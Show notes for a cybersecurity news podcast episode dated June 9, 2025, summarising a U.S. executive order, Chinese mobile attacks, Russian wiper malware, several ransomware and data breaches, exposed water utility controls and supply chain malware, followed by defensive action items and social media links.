Good Morning Security Gang,
Welcome to another episode of the Cyber Hub Podcast with your comprehensive breakdown of the week's most critical cybersecurity developments. This Monday, June 9, 2025 edition delivers breaking analysis on President Trump's game-changing cybersecurity executive order, escalating Chinese cyber threats, and critical infrastructure vulnerabilities that demand immediate attention from security professionals worldwide.
Cyber Hub Podcast - June 9, 2025
Executive Summary
This episode provides in-depth coverage of President Trump's aggressive new cybersecurity executive order that directly names China as America's primary cyber adversary, alongside comprehensive reporting on mobile device attacks targeting government officials, ongoing cyber warfare in Ukraine, and critical infrastructure security gaps that expose millions of Americans to potential attacks.
Trump Administration Issues Sweeping Cybersecurity Executive Order
President Donald J. Trump has issued a comprehensive executive order amending previous cybersecurity directives (EO 13694 and EO 14111), marking a dramatic shift in America's cybersecurity strategy. The order explicitly names China, alongside Russia, Iran, and North Korea, as America's biggest cyber threats, abandoning diplomatic language in favor of direct acknowledgment of an ongoing cyber cold war.
The directive establishes three critical requirements with aggressive timelines: post-quantum cryptography implementation by 2030, immediate deployment of AI-powered cyber defenses, and new cybersecurity standards for all software and smart devices. While government agencies use proprietary NSA and CIA-developed encryption algorithms rather than standard AES-256, the quantum threat primarily targets enterprise systems.
The order mandates federal agencies transition to quantum-resistant encryption within four and a half years and requires identification of quantum-safe products by December 2025. However, the directive lacks clear enforcement mechanisms and funding sources, raising questions about implementation feasibility, especially given CISA's loss of 1,000 employees since the beginning of 2025.
Sophisticated Mobile Device Attacks Target Government Officials and Journalists
Cybersecurity investigators have identified an unusual pattern of smartphone crashes affecting government workers, politicians, journalists, and activists, believed to be part of a sophisticated zero-click attack campaign. The attacks, which began in late 2024 and continued into 2025, required no user interaction and left no obvious traces.
Researchers at iVerify discovered that all victims worked in fields of strategic interest to the Chinese government and had previously been targeted by Chinese threat actors. This represents an escalating trend of mobile devices becoming primary attack vectors as they increasingly contain sensitive personal and professional information.
The attacks highlight the vulnerability of smartphones as critical weak links in U.S. cyber defenses, with Chinese military and intelligence-linked groups specifically targeting prominent Americans' mobile devices through sophisticated techniques that bypass traditional security measures.
Russia Deploys New Wiper Malware Against Ukrainian Critical Infrastructure
The ongoing Russia-Ukraine conflict has witnessed the deployment of new destructive malware targeting Ukraine's critical infrastructure systems. Cisco Talos researchers have identified "Path Wiper," a sophisticated piece of malware that shares similarities with the previously documented Hermetic Wiper, both attributed to the Russian threat group Sandworm.
The malware targets master boot records and NTFS-related artifacts, systematically corrupting data across all connected drives and volumes. Unlike its predecessor, Path Wiper uses more advanced techniques to identify and document valid records before destruction.
The attacks utilize legitimate endpoint administrative frameworks to execute malicious commands, making detection more challenging. This represents a concerning escalation in cyber warfare tactics that will likely migrate to civilian targets within one to two years, requiring immediate preparation by enterprise security teams worldwide.
AT&T Data Breach: Old Data Re-emerges with New Criminal Activity
Threat actors have re-released data from AT&T's 2021 breach affecting 70 million customers, attempting to monetize previously disclosed information by repackaging it as new stolen data. The data appeared on Russian-speaking hacking forums with claims it originated from the 2024 AT&T Snowflake attack that exposed call logs of 109 million customers.
However, analysis by security researchers indicates the leaked information actually stems from the 2021 breach, representing a common criminal tactic of recycling old data for financial gain. This incident highlights the long-term impact of data breaches, where compromised information continues to circulate in criminal markets years after initial disclosure, creating ongoing privacy and security risks for affected customers.
Optima Tax Relief Suffers Ransomware Attack by Chaos Group
The Chaos ransomware group has successfully breached Optima Tax Relief, a leading U.S. tax resolution firm that claims to have resolved nearly $3 billion in tax liabilities for customers. The threat actors have stolen 6-9 gigabytes of sensitive data and added the company to their data leak site, threatening to release confidential client information.
Optima Tax Relief specializes in helping individuals and businesses address federal and state income tax issues, making the breach particularly concerning due to the sensitive financial and personal information involved. The Chaos ransomware group has also claimed responsibility for breaching the Salvation Army, though that organization has not responded to media inquiries about the attack.
Critical Water Utility Infrastructure Exposed to Internet
Security researchers at Census have discovered hundreds of U.S. water utility control room dashboards directly accessible from the public internet, with dozens offering full, password-free control over critical infrastructure components including pumps, valves, and chemical feeds. The discovery began with routine scanning that identified TLS certificates containing "SCADA" labels, leading to the identification of vulnerable browser-based Human Machine Interface (HMI) platforms across three states.
Live screenshots revealed real-time operations including tank levels, chlorine pump cycles, and active alarm systems. The exposed systems ranged from read-only access to full unauthenticated control capabilities, representing a severe national security vulnerability. Due to the public utility nature of the targets, researchers bypassed standard disclosure processes and reported directly to the EPA and the unnamed HMI vendor for immediate remediation.
FBI Warns of BadBox 2.0 Botnet Infecting Million+ Devices
The FBI has issued a critical warning about the BadBox 2.0 malware campaign that has infected over one million home internet-connected devices, primarily targeting Chinese Android-based smart TVs, streaming boxes, projectors, tablets, and IoT devices commonly purchased through platforms like AliExpress. The botnet converts consumer electronics into residential proxies used for various criminal activities including ad fraud and credential stuffing attacks.
These compromised devices maintain multiple backdoors to proxy services that criminal actors either sell or provide free access to for malicious purposes. Home users often become unwitting participants in cyber attacks, with their devices serving as waypoints in larger criminal operations rather than direct targets, highlighting the hidden risks of purchasing inexpensive electronic devices without proper security validation.
Supply Chain Attack Targets GlueStack Packages
Researchers have identified a sophisticated supply chain attack affecting over a dozen packages associated with GlueStack, collectively accounting for nearly one million weekly downloads. The malware was introduced through unauthorized changes to the lib/common/javascript/index.js file, enabling attackers to execute shell commands, capture screenshots, and upload files from infected systems.
Akito Security discovered the compromise, noting that affected machines could be used for cryptocurrency mining, sensitive data theft, and service disruption. The first compromised package was detected on June 6 at 9:33 PM GMT, demonstrating the rapid pace at which supply chain attacks can propagate through widely-used development frameworks.
Akira Ransomware Exploits Unpatched Fortinet Vulnerabilities
The Akira ransomware operation, also tracked under the name Agenda since its August emergence as a ransomware-as-a-service operation, has begun actively exploiting two critical Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to deploy ransomware attacks. The threat group has targeted major organizations including automotive giant Yang Fang, Lee Enterprises, Australia's Court Services Victorian, and pathology service provider Synnovis.
The Synnovis incident particularly impacted major NHS hospitals in London, forcing the cancellation of hundreds of medical appointments and surgical operations. The vulnerabilities allow attackers to bypass authentication on vulnerable Fortinet devices and execute malicious code, emphasizing the critical importance of immediate patch deployment for organizations using affected systems.
Action Items for Security Professionals
Immediate: Patch Fortinet devices against CVE-2024-21762 and CVE-2024-55591 to prevent Akira ransomware attacks
This Month: Audit all internet-facing industrial control systems and HMI platforms for unauthorized access
By December 2025: Identify and evaluate quantum-safe cryptographic products for federal compliance requirements
Ongoing: Implement enhanced mobile device security monitoring for high-value targets in government and media sectors
Strategic: Begin planning post-quantum cryptography migration timeline for 2030 compliance
Vendor Management: Audit supply chain security for JavaScript packages and development dependencies
Network Security: Review and segment IoT devices, particularly inexpensive consumer electronics from overseas manufacturers
Incident Response: Prepare wiper malware detection and recovery procedures based on evolving attack techniques
✅ Story Links:
https://apnews.com/article/china-cybersecurity-hacking-smartphones-37bb5f10c6e21fec2863b1faf269cecc
https://www.securityweek.com/destructive-pathwiper-targeting-ukraines-critical-infrastructure/
https://www.securityweek.com/misconfigured-hmis-expose-us-water-systems-to-anyone-with-a-browser/
https://thehackernews.com/2025/06/new-supply-chain-malware-operation-hits.html
🔔 Subscribe now for the latest insights from industry leaders, in-depth analyses, and real-world strategies to secure your digital world. https://www.youtube.com/@TheCyberHubPodcast/?sub_confirmation=1
🚨 Important Links to Follow:
👉Website:
👉Listen here: https://linktr.ee/cyberhubpodcast
✅ Stay Connected With Us.
👉Facebook: https://www.facebook.com/CyberHubpodcast/
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
Share this post